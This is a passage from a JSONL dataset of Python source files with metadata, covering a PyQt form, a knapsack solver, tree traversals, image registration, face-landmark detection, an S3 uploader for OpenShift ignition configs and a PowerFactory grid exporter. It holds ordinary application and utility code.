else:\n rules = fingerprint_all_dict.get(path, [])\n if valid_rule not in rules:\n rules.append(valid_rule)\n fingerprint_all_dict[path] = rules\n web_fingerprint = dict(sorted(fingerprint_all_dict.items()))\n with open(\"web_fingerprint.json\", 'w') as wfp:\n json.dump(web_fingerprint, wfp)\n return web_fingerprint\n\n\nfingerprint_json_generator(\"fingerprint\")\n","sub_path":".github/script/auto_update.py","file_name":"auto_update.py","file_ext":"py","file_size_in_byte":2293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"585589462","text":"# coding=utf-8\nfrom PyQt4.QtGui import *\nfrom PyQt4.QtCore import *\n\nfrom c.error import Error\nfrom v.ui_editar import Ui_Editar\nfrom m.empleado import Empleado\n\nclass Editar(QDialog):\n\t\n\te = None\n\terror = None\n\t\n\tdef __init__(self, principal):\n\t\tQDialog.__init__(self, principal)\n\t\tself.ui = Ui_Editar()\n\t\tself.ui.setupUi(self)\n\t\t\n\t\tself.ui.buttonBox.button(QDialogButtonBox.Ok).setText(\"Aceptar\")\n\t\tself.ui.buttonBox.button(QDialogButtonBox.Cancel).setText(\"Cancelar\")\n\t\t\n\t\tself.error = Error(self)\n\t\t\n\t\tself.ui.leCuil.textChanged.connect(lambda : self.cambioCuil())\n\t\n\tdef center(self):\n\t\tqr = self.frameGeometry()\n\t\tcp = QDesktopWidget().availableGeometry().center()\n\t\tqr.moveCenter(cp)\n\t\tself.move(qr.topLeft())\n\t\n\tdef cambioCuil(self, ):\n\t\tc = str(self.ui.leCuil.text())\n\t\t\n\t\tif len(c) < 8:\n\t\t\treturn\n\t\telif len(c) > 8 and \"-\" not in c:\n\t\t\tc = c[:2] + \"-\" + c[2:]\n\t\telif len(c) == 12 and not c.endswith('-') and c[10] != '-':\n\t\t\tc = c[:11] + \"-\" + c[11:]\n\t\telif len(c) == 13 and c[11] != '-':\n\t\t\tc = c[:12]\n\t\t\n\t\tself.ui.leCuil.setText(c)\n\t\n\tdef mostrar(self, principal):\n\t\t\n\t\tself.center()\n\t\t\n\t\templeado = str(principal.ui.lblEmpleado.text().toUtf8())\n\t\t\n\t\tdocumento = empleado.split('(')[1]\n\t\t\n\t\tdocumento = int(documento[:-1])\n\t\t\n\t\tfor e in principal.empleados:\n\t\t\tif e.documento == documento:\n\t\t\t\tself.e = e\n\t\t\t\tbreak\n\t\t\n\t\tif self.e.cuil == \"\":\n\t\t\tself.ui.leCuil.setText(str(self.e.documento))\n\t\telse:\n\t\t\tself.ui.leCuil.setText(self.e.cuil)\n\t\tself.ui.leNombre.setText(self.e.nombre.decode('utf-8'))\n\t\tself.ui.leApellido.setText(self.e.apellido.decode('utf-8'))\n\t\t\n\t\tf_nacimiento = QDate()\n\t\tdia, mes, anio = self.e.fecha_nacimiento.split('/')\n\t\tf_nacimiento.setDate(int(anio), int(mes), int(dia))\n\t\tself.ui.deFechaNacimiento.setDate(f_nacimiento)\n\t\t\n\t\tgeneros = {'F' : 0, 'M' : 1}\n\t\tself.ui.cmbGenero.setCurrentIndex(generos[self.e.genero])\n\t\tself.ui.leDomicilio.setText(self.e.domicilio.decode('utf-8'))\n\t\tself.ui.leTelefono.setText(self.e.telefono)\n\t\t\n\t\tf_ingreso = QDate()\n\t\tdia, mes, anio = self.e.fecha_ingreso.split('/')\n\t\tf_ingreso.setDate(int(anio), int(mes), int(dia))\n\t\tself.ui.deFechaIngreso.setDate(f_ingreso)\n\t\tself.ui.sbNroLegajo.setValue(self.e.nro_legajo)\n\t\t\n\t\trevistas = {'Comisión' : 0, 'Pasantía' : 1, 'Permanente' : 2, 'Temporaria' : 3, 'Transitoria' : 4}\n\t\tself.ui.cmbRevista.setCurrentIndex(revistas[self.e.sit_revista])\n\t\t\n\t\tcargos = {'Administrativo' : 0, 'Jerárquico' : 1, 'Obrero' : 2, 'Profesional' : 3, 'Servicio' : 4}\n\t\tself.ui.cmbCargo.setCurrentIndex(cargos[self.e.cargo])\n\t\t\n\t\tself.show()\n\t\n\tdef closeEvent(self, event):\n\t\tpass\n\t\n\tdef reject(self, ):\n\t\t\n\t\tself.limpiar()\n\t\t\n\t\tself.done(QDialog.Rejected)\n\t\t\n\tdef 
accept(self, ):\n\t\ttry:\n\t\t\tself.e.cuil = str(self.ui.leCuil.text())\n\t\t\t\n\t\t\tif '-' in self.e.cuil:\n\t\t\t\t\n\t\t\t\tp = \"\"\n\t\t\t\tdoc = \"\"\n\t\t\t\ts = \"\"\n\t\t\t\t\n\t\t\t\ttry:\n\t\t\t\t\tp, doc, s = self.e.cuil.split('-')\n\t\t\t\texcept Exception as ex:\n\t\t\t\t\traise Exception(\"El cuil no cumple con el formato necesario: \" + str(ex))\n\t\t\t\t\n\t\t\t\tself.e.documento = doc\n\t\t\t\t\n\t\t\telse:\n\t\t\t\tself.e.documento = str(self.ui.leCuil.text())\n\t\t\t\n\t\t\tself.e.nombre = str(self.ui.leNombre.text().toUtf8())\n\t\t\tself.e.apellido = str(self.ui.leApellido.text().toUtf8())\n\t\t\tself.e.fecha_nacimiento = str(self.ui.deFechaNacimiento.text())\n\t\t\tself.e.genero = str(self.ui.cmbGenero.currentText())\n\t\t\tself.e.domicilio = str(self.ui.leDomicilio.text().toUtf8())\n\t\t\tself.e.telefono = str(self.ui.leTelefono.text())\n\t\t\tself.e.fecha_ingreso = str(self.ui.deFechaIngreso.text())\n\t\t\tself.e.nro_legajo = str(self.ui.sbNroLegajo.text())\n\t\t\tself.e.sit_revista = str(self.ui.cmbRevista.currentText().toUtf8())\n\t\t\tself.e.cargo = str(self.ui.cmbCargo.currentText().toUtf8())\n\t\t\t\n\t\t\t\n\t\t\tself.e.guardar()\n\t\t\t\n\t\t\tself.limpiar()\n\t\t\t\n\t\t\tself.done(QDialog.Accepted)\n\t\t\t\n\t\texcept Exception as ex:\n\t\t\tself.error.setText(\"Ha ocurrido un error mientras intentaba editar un empleado.\".decode('utf-8'))\n\t\t\tself.error.setDetailedText(str(ex).decode('utf-8'))\n\t\t\tself.error.mostrar()\n\t\n\tdef limpiar(self, ):\n\t\t\n\t\tself.ui.sbNroLegajo.setValue(0)\n\t\tself.ui.leNombre.setText(\"\")\n\t\tself.ui.leApellido.setText(\"\")\n\t\tself.ui.leCuil.setText(\"\")\n\t\tself.ui.leNivel.setText(\"\")\n\t\tself.ui.leDomicilio.setText(\"\")\n\t\tself.ui.leTelefono.setText(\"\")\n\t\tself.ui.cmbGenero.setCurrentIndex(0)\n\t\tself.ui.cmbRevista.setCurrentIndex(0)\n\t\tself.ui.cmbCargo.setCurrentIndex(0)\n\t\t\n","sub_path":"c/editar.py","file_name":"editar.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"502987211","text":"# implementation by @kaba_y, https://korogba.github.io\nimport sys\n\nfrom utils.file_operations import convert_file_to_knapsack\n\n# throws a maximum recursion depth exceeded error if the limit is not raised\nsys.setrecursionlimit(3000)\nvalue_list, weight_list, capacity = convert_file_to_knapsack('../input_random_44_2000000_2000.txt')\nfound_solutions = {}\nsorted_weights = sorted(weight_list)\n\n\ndef knapsack_recursive(i, cap) -> int:\n    if i == 0 or cap == 0:\n        return 0\n\n    if (i, cap) in found_solutions:\n        return found_solutions[(i, cap)]\n\n    if weight_list[i] > cap:\n        found_solutions[(i, cap)] = knapsack_recursive(i - 1, cap)\n    else:\n        found_solutions[(i, cap)] = max(knapsack_recursive(i - 1, cap),\n                                        knapsack_recursive(i - 1, cap - weight_list[i]) + value_list[i])\n\n    return found_solutions[(i, cap)]\n\n\nprint(knapsack_recursive(len(value_list) - 1, capacity))\n","sub_path":"dynamic_programming/knapsack_recursive.py","file_name":"knapsack_recursive.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"162999062","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 29 20:54:55 2020\n\n@author: 九童\nUse and evaluation of the speech recognition model\n\"\"\"\nimport scipy.io.wavfile\nfrom hlp.stt.las.data_processing import mfcc_extract\nimport tensorflow as tf\nimport numpy as np\n\ndef 
evaluate(wav_path,max_length_inp,max_length_targ,targ_lang_tokenizer,model):\n    #sentence = preprocess_en_sentence(sentence)\n    sample_rate, signal = scipy.io.wavfile.read(wav_path)\n    wav_mfcc = mfcc_extract.MFCC(sample_rate,signal)\n\n    #inputs = [inp_lang.word_index[i] for i in sentence.split(' ')]  # token encoding\n    #inputs = tf.keras.preprocessing.sequence.pad_sequences([inputs],\n                                                           #maxlen=max_length_inp,\n                                                           #padding='post')  # padding\n    #print('====wav_mfcc.shape = {}'.format(wav_mfcc.shape))#(60, 39)\n    wav_mfcc = tf.expand_dims(wav_mfcc, 0)#(1,60, 39)\n    wav_mfcc = tf.keras.preprocessing.sequence.pad_sequences(wav_mfcc,maxlen = max_length_inp,padding='post',dtype = float)\n    wav_mfcc = tf.convert_to_tensor(wav_mfcc)  # convert the numpy array to a tensor\n    \n    #print('====wav_mfcc.shape = {}'.format(wav_mfcc.shape))#(1,93, 39)\n    result = ''  # string that accumulates the recognition result\n\n    \n    dec_input=tf.keras.utils.to_categorical([targ_lang_tokenizer.word_index['<start>'] - 1],num_classes=len(targ_lang_tokenizer.word_index)+1)    \n    dec_input = tf.expand_dims(dec_input, 1)\n    dec_input = np.array(dec_input).astype(int)\n    dec_input = tf.convert_to_tensor(dec_input)\n    #print('====dec_input = {}'.format(dec_input))\n    for t in range(max_length_targ):  # decode or predict step by step\n        predictions = model([wav_mfcc, dec_input])\n        #print('====predictions.shape = {}'.format(predictions.shape))\n        predicted_id = tf.argmax(predictions[0][0]).numpy() + 1  # greedy decoding, take the max\n        #print('====predicted_id = {}'.format(predicted_id))\n        \n        result += targ_lang_tokenizer.index_word[predicted_id] + ' '  # target sentence\n        #print('====result = {}'.format(result))\n        if targ_lang_tokenizer.index_word[predicted_id] == '<end>':\n            return result\n\n        # the predicted ID is fed back into the model\n        dec_input = tf.keras.utils.to_categorical([predicted_id - 1],num_classes=len(targ_lang_tokenizer.word_index)+1)\n        dec_input = tf.expand_dims(dec_input, 1)\n        #print('====afterdec_input.shape = {}'.format(dec_input.shape))\n\n    return result\n\n\n\ndef speech_recognition(wav_path,max_length_inp,max_length_targ,targ_lang_tokenizer,model):\n    \n    result = evaluate(wav_path,max_length_inp,max_length_targ,targ_lang_tokenizer,model)\n    print('Predicted speech_recognition: {}'.format(result))\n\n    \n","sub_path":"hlp/stt/las/recognition_evaluate.py","file_name":"recognition_evaluate.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"457442674","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Document',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('docfile', models.FileField(upload_to=b'documents/%Y/%m/%d')),\n                ('owner', models.ForeignKey(related_name='document', to=settings.AUTH_USER_MODEL)),\n            ],\n            options={\n            },\n            bases=(models.Model,),\n        ),\n        migrations.CreateModel(\n            name='Incentive',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('created', models.DateTimeField(auto_now_add=True)),\n                ('schemeID', models.IntegerField(default=0)),\n                ('schemeName', models.CharField(default=b'', max_length=100, blank=True)),\n                ('typeID', models.IntegerField(default=0)),\n                ('typeName', models.CharField(default=b'', max_length=100, blank=True)),\n                ('status', models.BooleanField(default=True)),\n                
('ordinal', models.IntegerField(default=0, null=True, blank=True)),\n ('modeID', models.IntegerField(default=0)),\n ('presentationDuration', models.DateTimeField(auto_now_add=True)),\n ('groupIncentive', models.BooleanField(default=False)),\n ('text', models.TextField()),\n ('condition', models.TextField()),\n ('owner', models.ForeignKey(related_name='incentive', to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ('created',),\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Tag',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('tagID', models.IntegerField()),\n ('tagName', models.CharField(max_length=100)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='incentive',\n name='tags',\n field=models.ManyToManyField(to='incentive.Tag', null=True, blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"src/incentive/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2670,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"160008827","text":"import tkinter as tk\r\nroot = tk.Tk()\r\n\r\ndef addition():\r\n mylable = tk.Label(root, text=\"heloo\")\r\n mylable.pack()\r\n\r\nmybutton = tk.Button(root, text=\"Click Me\", command=addition)\r\nmybutton.pack()\r\n# Code to add widgets will qgo here...\r\nroot.mainloop()","sub_path":"buttons.py","file_name":"buttons.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"94412236","text":"from collections import deque\nclass Node(object):\n def __init__(self, data):\n self.value = data\n self.left = None\n self.right = None\n\n def __repr__(self):\n return(dir(self.root.value))\n #return \"\" % (self.root, self.root.value)\n\nclass BinaryTree(object):\n def __init__(self, root):\n self.root = Node(root)\n\n\n def print_tree(self, type='pre_order'):\n if type == 'pre_order':\n return (self.pre_order_traversal(self.root, ''))\n elif type == 'in_order':\n return (self.in_order_traversal(self.root, ''))\n elif type == 'post_order':\n return (self.post_order_traversal(self.root, ''))\n elif type == 'level_order':\n return (self.level_order_traversal(self.root, ''))\n else:\n return -1\n\n def pre_order_traversal(self, start, traversal):\n \"\"\"root->Left->right\"\"\"\n if start:\n traversal += ' ' + str(start.value)\n traversal = self.pre_order_traversal(start.left, traversal)\n traversal = self.pre_order_traversal(start.right, traversal)\n return traversal\n\n def in_order_traversal(self, start, traversal):\n \"\"\"Left->root->right\"\"\"\n if start:\n traversal = self.in_order_traversal(start.left, traversal)\n traversal += ' ' + str(start.value)\n traversal = self.in_order_traversal(start.right, traversal)\n return traversal\n\n def post_order_traversal(self, start, traversal):\n \"\"\"left->right->root\"\"\"\n if start:\n traversal = self.post_order_traversal(start.left, traversal)\n traversal = self.post_order_traversal(start.right, traversal)\n traversal += ' ' + str(start.value)\n return traversal\n\n\n def level_order_traversal(self, root, traversal):\n if root == None:\n return\n\n current_queue = deque()\n current_queue.append(root)\n current_queue.append(None)\n\n while len(current_queue) != 0:\n temp = current_queue.popleft()\n #print (str(temp.value) + \",\",)\n\n if temp.left != None:\n 
current_queue.append(temp.left)\n\n if temp.right != None:\n current_queue.append(temp.right)\n\n if current_queue[0] == None:\n print(current_queue.popleft())\n\n if len(current_queue) != 0:\n current_queue.append(None)\n\n\ntree = BinaryTree(7)\ntree.root.left = Node(3)\ntree.root.right = Node(15)\ntree.root.right.left = Node(9)\ntree.root.right.right = Node(20)\n\n\"\"\"\ntree = BinaryTree(3)\ntree.root.left = Node(9)\ntree.root.right = Node(8)\n\ntree.root.left.left = Node(4)\ntree.root.left.right = Node(1)\n\ntree.root.right.left = Node(0)\ntree.root.right.right = Node(7)\n\ntree.root.right.left.left = Node(5)\ntree.root.right.left.right = Node(2)\nr = tree.__repr__()\nprint(\"RE \",r)\n\"\"\"\n\"\"\"\nInput: [3,9,8,4,0,1,7,null,null,null,2,5] (0's right child is 2 and 1's left child is 5)\n\n 3\n /\\\n / \\\n 9 8\n /\\ /\\\n / \\/ \\\n 4 01 7\n /\\\n / \\\n 5 2\n\n\n[\n [4],\n [9,5],\n [3,0,1],\n [8,2],\n [7]\n]\n\"\"\"\nprint(tree.print_tree('pre_order'))\nprint(tree.print_tree('in_order'))\nprint(tree.print_tree('post_order'))\nprint(tree.print_tree('level_order'))\n\"\"\"\n100\n50\n25\n75\n200\n125\n300\n\n100\n50, 200\n25, 75, 350\n\n #pre-order - 100 50 25 75 200 125 300\n #in-order - 25 50 75 100 125 200 300\n #post-order - 25 75 50 125 300 200 100\n\"\"\"\n","sub_path":"miscellaneous/binary_tree.py","file_name":"binary_tree.py","file_ext":"py","file_size_in_byte":3489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"304866723","text":"#!/usr/bin/env python\n\nimport argparse\nimport json\nimport logging\nimport subprocess\nimport sys\nimport os\nimport boto3\nfrom botocore.exceptions import NoCredentialsError\n\n\ndef get_s3_client(s3_endpoint_url):\n aws_access_key_id = os.environ.get(\"aws_access_key_id\", \"accessKey1\")\n aws_secret_access_key = os.environ.get(\"aws_secret_access_key\", \"verySecretKey1\")\n\n s3_client = boto3.client(\n 's3',\n aws_access_key_id=aws_access_key_id,\n aws_secret_access_key=aws_secret_access_key,\n endpoint_url=s3_endpoint_url\n )\n return s3_client\n\n\ndef upload_to_aws(s3_client, local_file, bucket, s3_file):\n try:\n s3_client.upload_file(local_file, bucket, s3_file, ExtraArgs={'ACL': 'public-read'})\n print(\"Upload Successful\")\n return True\n except NoCredentialsError:\n print(\"Credentials not available\")\n return False\n\n\ndef remove_bmo_provisioning(ignition_file):\n found = False\n with open(ignition_file, \"r\") as file_obj:\n data = json.load(file_obj)\n storage_files = data['storage']['files']\n # Iterate through a copy of the list\n for file_data in storage_files[:]:\n if 'baremetal-provisioning-config' in file_data['path']:\n storage_files.remove(file_data)\n found = True\n break\n if found:\n with open(ignition_file, \"w\") as file_obj:\n json.dump(data, file_obj)\n\n\ndef upload_to_s3(s3_endpoint_url, bucket, install_dir):\n s3_client = get_s3_client(s3_endpoint_url)\n prefix = os.environ.get(\"CLUSTER_ID\")\n\n for root, _, files in os.walk(install_dir):\n for file_name in files:\n logging.info(\"Uploading file: %s\", file_name)\n file_path = os.path.join(root, file_name)\n if file_name == \"kubeconfig\":\n file_name = \"kubeconfig-noingress\"\n s3_file_name = \"{}/{}\".format(prefix, file_name)\n print(s3_file_name)\n upload_to_aws(s3_client, file_path, bucket, s3_file_name)\n\n\ndef debug_print_upload_to_s3(install_dir):\n prefix = \"dummy_cluster_id\"\n for root, _, files in os.walk(install_dir):\n for file_name in files:\n file_path = os.path.join(root, 
file_name)\n if file_name == \"kubeconfig\":\n file_name = \"kubeconfig-noingress\"\n s3_file_name = \"{}/{}\".format(prefix, file_name)\n print(\"Uploading file %s as object %s\" % (file_path, s3_file_name))\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Generate ignition manifest & kubeconfig')\n parser.add_argument('--s3_endpoint_url', help='s3 endpoint url', default=None)\n parser.add_argument('--s3_bucket', help='s3 bucket', default='test')\n args = parser.parse_args()\n\n work_dir = os.environ.get(\"WORK_DIR\")\n if not work_dir:\n raise Exception(\"working directory was not defined\")\n\n install_config = os.environ.get(\"INSTALLER_CONFIG\")\n config_dir = os.path.join(work_dir, \"installer_dir\")\n if install_config:\n subprocess.check_output([\"mkdir\", \"-p\", config_dir])\n with open(os.path.join(config_dir, 'install-config.yaml'), 'w+') as file_obj:\n file_obj.write(install_config)\n if not os.path.isdir(config_dir):\n raise Exception('installer directory is not mounted')\n\n if not os.path.isfile(os.path.join(config_dir, 'install-config.yaml')):\n raise Exception(\"install config file not located in installer dir\")\n\n command = \"OPENSHIFT_INSTALL_INVOKER=\\\"assisted-installer\\\" %s/openshift-install create ignition-configs --dir %s\" % (work_dir, config_dir)\n try:\n subprocess.check_output(command, shell=True, stderr=sys.stdout)\n except Exception as ex:\n raise Exception('Failed to generate files, exception: {}'.format(ex))\n\n try:\n remove_bmo_provisioning(\"%s/bootstrap.ign\" % config_dir)\n except Exception as ex:\n raise Exception('Failed to remove BMO provisioning configuration from bootstrap ignition, exception: {}'.format(ex))\n\n s3_endpoint_url = os.environ.get(\"S3_ENDPOINT_URL\", args.s3_endpoint_url)\n if s3_endpoint_url:\n bucket = os.environ.get('S3_BUCKET', args.s3_bucket)\n upload_to_s3(s3_endpoint_url, bucket, config_dir)\n else:\n # for debug purposes\n debug_print_upload_to_s3(config_dir)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"render_files.py","file_name":"render_files.py","file_ext":"py","file_size_in_byte":4383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"226344748","text":"# -*- coding: utf-8 -*-\n# @Author: jose\n# @Date: 2019-01-27 17:34:53\n# @Last Modified by: jose\n# @Last Modified time: 2021-03-03 08:13:22\n\nimport os # os library, used to read files\nimport argparse # argument parser\n\nfrom folder_utils import *\n\ndef main():\n # Arguments details\n parser = argparse.ArgumentParser(description='Transform all dose images in a folder to a single reference image. 
\\\n Registration with ANTS library')\n parser.add_argument(\"reference\", type=str, \n help='Reference image file')\n parser.add_argument(\"dose_folder\", type=str, \n help='Dose folder with images')\n parser.add_argument(\"transform_folder\", type=str,\n help='Folder with computed transformations')\n parser.add_argument(\"output_folder\", type=str, \n help='Output folder with images')\n parser.add_argument('-d','--debug', action='store_true',\n help='Enable debug mode')\n parser.add_argument('-v','--verbose', action='store_true',\n help='Enable verbose mode')\n\n # Parse arguments\n args = parser.parse_args()\n dose_folder = args.dose_folder\n transform_folder = args.transform_folder\n output_folder = args.output_folder\n reference = args.reference\n\n # Files organized alphabetically\n dose_files = os.listdir(dose_folder)\n dose_files.sort()\n\n # Transforms organized\n transform_files = os.listdir(transform_folder)\n transform_files.sort()\n\n affine_prefix = ['_0Generic']\n dfield_prefix = ['_1Warp.nii.gz']\n affine_files = filter_folders_prefix(affine_prefix, transform_files)\n dfield_files = filter_folders_prefix(dfield_prefix, transform_files)\n\n # Remove reference dose if inside dose files\n numref = os.path.splitext(os.path.basename(reference))[0][-2:] # reference number\n indices = [i for i, s in enumerate(dose_files) if numref in s] # index where numref is in dose file\n for k in sorted(indices, reverse=True): # delete from the end so the remaining indices stay valid\n del dose_files[k]\n \n print('\\nRunning script to transform 3d images based on a reference.')\n if args.debug:\n print('[Debug Mode]')\n if args.verbose:\n print('\\nReference file: \\n' + str(fullpath_to_localpath([reference])) )\n print('\\nFiles found: \\n' + str(dose_files))\n print('\\nAffine transforms found: \\n' + str(affine_files))\n print('\\nField transforms found: \\n' + str(dfield_files))\n\n # assert(len(dfield_files) == len(affine_files) and len(dfield_files) == len(dose_files))\n \n\n # Create directory to save output\n output_path = os.path.join(output_folder,'warped_doses_ants/') # output path\n print('\\nCreate output folder:')\n os.system('echo mkdir -p ' + output_path ) # echo mkdir\n if not args.debug: \n os.system('mkdir -p ' + output_path ) # make directory\n\n\n print('\\nTransformations:')\n \n # Script loop\n c = 0\n k = 0\n while c < len(dose_files):\n # for k in range(len(dose_files)):\n num_img = 'dose' + str(k+1).zfill(2) # the files contain the word dose\n doses_to_process = [[i for i, s in enumerate(dose_files) if num_img in s]]\n # print(num_img)\n # print(doses_to_process)\n\n for d,j in enumerate (doses_to_process[0]):\n # Moving image path\n moving_image = os.path.join(dose_folder, dose_files[j])\n \n # Output file names\n out_prefix = '{}_to_{}.nrrd'.format(os.path.splitext(os.path.basename(dose_files[j]))[0], \n os.path.splitext(os.path.basename(reference))[0][-10:])\n output = os.path.join(output_path, out_prefix)\n\n\n affine_transform = os.path.join(transform_folder, affine_files[k])\n dfield_transform = os.path.join(transform_folder, dfield_files[k])\n\n cmd = 'antsApplyTransforms -d 3 \\\n -i {} -o {} -r {} -t {} -t {}'.format( moving_image, output , reference , dfield_transform, affine_transform )\n\n # Execute the command\n \n os.system('echo ' + cmd)\n if not args.debug:\n os.system(cmd) \n\n\n c += len(doses_to_process[0])\n k += 1\n print(k,c)\n\n '''\n\n \n '''\n return\n \n\nif __name__ == \"__main__\":\n # execute only if run as a script\n 
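# example invocation (hypothetical paths for the four positional arguments above): python transform_referenced_ants.py reference.nrrd doses/ transforms/ output/\n 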
main()\n","sub_path":"transform_referenced_ants.py","file_name":"transform_referenced_ants.py","file_ext":"py","file_size_in_byte":4483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"215914584","text":"import cv2\nimport dlib\n\n#read img\nimg = cv2.imread(\"Face\\mc.jpg\")\n#convert img to grayscale: 3D->2D\ngray = cv2.cvtColor(src=img,code=cv2.COLOR_BGR2GRAY)\n#dlib: Load Face Recognition Detector\nface_detector = dlib.get_frontal_face_detector()\n#load the predictor\npredictor = dlib.shape_predictor(\"Face\\shape_predictor_68_face_landmarks.dat\")\n#use detector to find face landmarks\nfaces = face_detector(gray)\nfor face in faces:\n x1 = face.left()\n y1 = face.top()\n x2 = face.right()\n y2 = face.bottom()\n #Draw a rectangle\n cv2.rectangle(img= img, pt1=(x1,y1), pt2=(x2,y2), color=(0,255,0), thickness=3)\n face_features = predictor(image=gray,box=face)\n\n #Loop through all 68 points\n for n in range(0, 68):\n x = face_features.part(n).x\n y = face_features.part(n).y\n cv2.circle(img=img, center=(x,y), radius=2, color=(0,0,255), thickness=2)\n#show img\ncv2.imshow(\"Face App\", img)\n#wait for key press to exit\ncv2.waitKey(delay=0)\n#close all windows\ncv2.destroyAllWindows()","sub_path":"Face/face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"172589608","text":"# Print the word \"hola\" 10 times\n\ncadena = 'hola mundo'\n\n# num = 1\n# while something is true -> perform that action\n# while num <= 10:\n# print(cadena)\n# num = num + 1\n\n# now with FOR -> iterate over data collections [lists, tuples, sets, dictionaries, etc.]\nfor num in range(10):\n print(cadena)","sub_path":"Modulo2/scripts/repeticiones.py","file_name":"repeticiones.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"204503473","text":"import powerfactory # @UnresolvedImport @UnusedVariable\nimport json\nimport inspect\nimport os\nimport re\nimport pf2jsonUtils\n# fixme: Delete reload after development\nimport importlib\nimportlib.reload(pf2jsonUtils)\nfrom pf2jsonUtils import attributes4export, elements4export, nested_elements4export, reserved_keywords\n\n#################\n# Configuration #\n#################\n\nexported_grid_dir = \"../pfGridExport\"\nexported_grid_file = os.path.join(exported_grid_dir, \"pfGrid.json\")\n\n##########\n# Script #\n##########\n\ndef name_without_preamble(full_name):\n \"\"\"\n Remove name pollution by omitting uniform file path preamble\n \"\"\"\n match = re.search('(?<=Network Data\\.IntPrjfolder\\\\\\\\|Type Library\\.IntPrjfolder\\\\\\\\).*', full_name)\n return match.group() if match is not None else full_name\n\ndef safe_name(unsafe_str):\n if unsafe_str in reserved_keywords or unsafe_str.endswith('_'):\n return f\"{unsafe_str}_safe\" # only way to avoid auto generation of scala class adding backticks or similar\n return unsafe_str\n\ndef get_attribute_dict(raw_element, attributes_to_include, append_type=False):\n \"\"\"\n Creates a dict which includes all members/fields noted in included_fields of a given raw PowerFactory element.\n \"\"\"\n element = {\"id\": name_without_preamble(raw_element.GetFullName())}\n for member in inspect.getmembers(raw_element):\n if not (\n member[0].startswith('_')\n and inspect.ismethod(member[1])\n and isinstance(member[1], 
powerfactory.Method)\n and inspect.isclass(member[1])\n ) and member[0] in attributes_to_include:\n if not isinstance(member[1], powerfactory.DataObject):\n element[safe_name(member[0])] = member[1]\n elif isinstance(member[1], powerfactory.DataObject) and member[0] in nested_elements4export:\n element[safe_name(member[0])] = get_attribute_dicts([member[1]], attributes4export[member[0]])\n if append_type:\n element[\"pfCls\"] = raw_element.GetClassName()\n return element\n\n\ndef get_attribute_dicts(raw_elements, attributes_to_include):\n \"\"\"\n Creates a list with an attribute dictionary for each raw PowerFactory element\n \"\"\"\n elements = []\n pf_edges = [\"ElmLne\", \"ElmCoup\"]\n for raw_element in raw_elements:\n element = get_attribute_dict(raw_element, attributes_to_include)\n\n # export connected elements of nodes and transformers\n if (raw_element.GetClassName() in [\"ElmTerm\", \"ElmTr2\", \"ElmTr3\"]):\n element[\"conElms\"] = []\n for con_elm in raw_element.GetConnectedElements():\n element[\"conElms\"].append(get_attribute_dict(con_elm, attributes4export[\"conElms\"], True))\n\n # export ids of nodes the edges are connected to\n if (raw_element.GetClassName() in pf_edges):\n try:\n element[\"bus1Id\"] = name_without_preamble(raw_element.bus1.cterm.GetFullName())\n except Exception:\n element[\"bus1Id\"] = None\n try:\n element[\"bus2Id\"] = name_without_preamble(raw_element.bus2.cterm.GetFullName())\n except Exception:\n element[\"bus2Id\"] = None\n\n elements.append(element)\n return elements\n\n\ndpf = powerfactory.GetApplication()\ndpf.EchoOff()\nproject = dpf.GetActiveProject()\npfGrid = {} # resulting pf grid json export\n\n# get general settings\npfGrid.update({\"projectSettings\":\n [{\n \"unitSystem\": project.ilenunit,\n \"prefixPQS\": project.cspqexp,\n \"prefixLength\": project.clenexp\n }]\n})\n\n# generate json strings\nfor element_name in elements4export:\n pfGrid.update({element_name: get_attribute_dicts(dpf.GetCalcRelevantObjects(elements4export[element_name]),\n attributes4export[element_name])})\n\n# write\nif not os.path.exists(exported_grid_dir):\n os.makedirs(exported_grid_dir)\n\nwith open(exported_grid_file, 'w') as f:\n json.dump(pfGrid, f, indent= 2)","sub_path":"src/main/python/powerFactory2json/pf2json.py","file_name":"pf2json.py","file_ext":"py","file_size_in_byte":4019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"534208526","text":"'''\nCreated on Sep 